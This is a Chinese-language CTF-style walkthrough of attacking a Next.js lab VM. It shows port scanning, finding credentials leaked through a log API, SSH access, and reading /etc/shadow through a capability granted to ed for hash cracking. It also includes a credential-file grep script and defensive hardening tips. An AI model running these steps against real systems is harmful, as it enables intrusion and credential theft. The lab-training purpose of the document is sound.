Next.js靶机渗透实战：从信息搜集到Root提权

1. 靶机环境搭建与信息搜集

在开始渗透测试之前，我们需要先搭建一个Next.js靶机环境。这个靶机模拟了一个真实的网络安全研究公司的网站，包含了常见的Next.js特性如API路由、动态页面渲染等。我推荐使用Docker快速部署：

docker run -d -p 3000:3000 --name nextjs-target maze-sec/nextjs-pentest-lab:2025

部署完成后，我们首先进行基础信息搜集。使用nmap扫描靶机开放端口是最基础也是最重要的一步：

nmap -A -p- 192.168.21.12

扫描结果通常会显示三个关键端口：

• 22/tcp：SSH服务
• 80/tcp：传统的Apache Web服务
• 3000/tcp：Next.js应用服务

这里有个细节需要注意：Next.js默认运行在3000端口，但实际生产环境可能会使用Nginx反向代理。靶机保留了3000端口的直接访问，这给了我们更多攻击面。

2. Next.js应用指纹识别

通过curl获取首页内容可以识别Next.js版本特征：

curl -I http://192.168.21.12:3000

关键识别点包括：

• X-Powered-By: Next.js响应头
• _next/static静态资源路径
• 页面中的__NEXT_DATA__脚本标签

我在实际测试中发现，这个靶机在HTML注释中藏了一个重要提示：

<meta name="hint" content="Authorized access at a secret endpoint. Try 2025." />

这种开发时遗留的调试信息在真实渗透测试中经常遇到。我们可以用dirsearch进行目录爆破：

dirsearch -u http://192.168.21.12:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

3. API路由漏洞利用

Next.js的API路由特性（pages/api/*）是重点攻击面。我们发现了一个隐藏的日志接口：

curl http://192.168.21.12:3000/api/logs

返回的日志中包含了致命信息：

"2025-09-12 10:07:12 - Successful login: c1trus with password MazeSecure@2025!" "2025-09-12 10:20:09 - Database backup: user=c1trus_db_admin, pass=MazeDB2025!"

这种日志泄露在现实场景中很常见，特别是开发阶段为了方便调试未做访问控制。拿到凭证后，我们可以尝试SSH登录：

ssh c1trus@192.168.21.12

4. Linux系统提权

成功获取普通用户权限后，我们开始寻找提权机会。首先检查sudo权限：

sudo -l

如果没有sudo权限，检查特殊权限文件：

getcap -r / 2>/dev/null

发现关键线索：

/usr/bin/ed = cap_dac_read_search+ep

这个编辑器被赋予了读取任意文件的能力。我们可以用它读取/etc/shadow文件：

/usr/bin/ed /etc/shadow

拿到root哈希后，用John the Ripper破解：

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

5. 防御措施建议

针对这类攻击，我有几点防御建议：

1. Next.js配置加固：

// next.config.js module.exports = { poweredByHeader: false, // 移除X-Powered-By trailingSlash: true // 避免目录遍历 }

2. API路由保护：

// pages/api/logs.js export default function handler(req, res) { const ip = req.headers['x-real-ip'] || req.connection.remoteAddress if(!isInternalIP(ip)) { return res.status(403).json({ error: 'Forbidden' }) } // ...原有逻辑 }

3. Linux权限管理：

• 定期审计特殊权限文件
• 使用AppArmor限制关键应用能力
• 及时更新系统和依赖包

6. 渗透测试经验分享

在实际测试中，我发现Next.js应用有几个常见漏洞模式：

1. 开发模式信息泄露： 很多团队会忘记关闭调试接口，比如/_next/development路由在生产环境仍然可用。

2. SSR注入漏洞：

// 危险的getServerSideProps实现 export async function getServerSideProps(context) { const { user } = context.query return { props: { data: await fetchInternalAPI(`/user/${user}`) } } }

3. 中间件配置错误：

// middleware.js错误配置 export const config = { matcher: '/:path*', // 过于宽松的匹配规则 }

7. 自动化渗透测试脚本

对于重复性工作，我编写了几个实用脚本：

1. Next.js路由扫描器：

import requests from concurrent.futures import ThreadPoolExecutor NEXT_ROUTES = [ '/_next/static', '/api', '/_next/data', '/_next/development' ] def check_route(host, route): try: r = requests.get(f"http://{host}:3000{route}", timeout=3) if r.status_code < 400: print(f"[+] Found accessible route: {route}") except: pass with ThreadPoolExecutor(max_workers=10) as executor: for route in NEXT_ROUTES: executor.submit(check_route, '192.168.21.12', route)

2. 敏感文件检查工具：

#!/bin/bash for file in $(find / -name "*.env" -o -name "*.bak" 2>/dev/null); do echo "Checking $file" grep -iE "password|secret|key|token" $file | awk '{print "\033[31m" $0 "\033[0m"}' done

8. 渗透测试后的思考

完成这次靶机渗透后，我总结了几个关键点：

1. 信息搜集要彻底：那个藏在meta标签里的提示差点被我忽略，耐心是关键。

2. 链条要完整：从Web漏洞到系统提权，每个环节都要考虑如何衔接。

3. 自动化与手工结合：基础扫描用工具，关键突破靠人工分析。

4. 防御要分层：没有银弹，必须多层次的防御措施组合使用。

最后提醒大家，所有渗透测试必须获得授权，本文技术仅用于合法安全测试。在实际项目中，我遇到过因为一个配置错误导致整个系统沦陷的案例，安全无小事，每个细节都值得重视。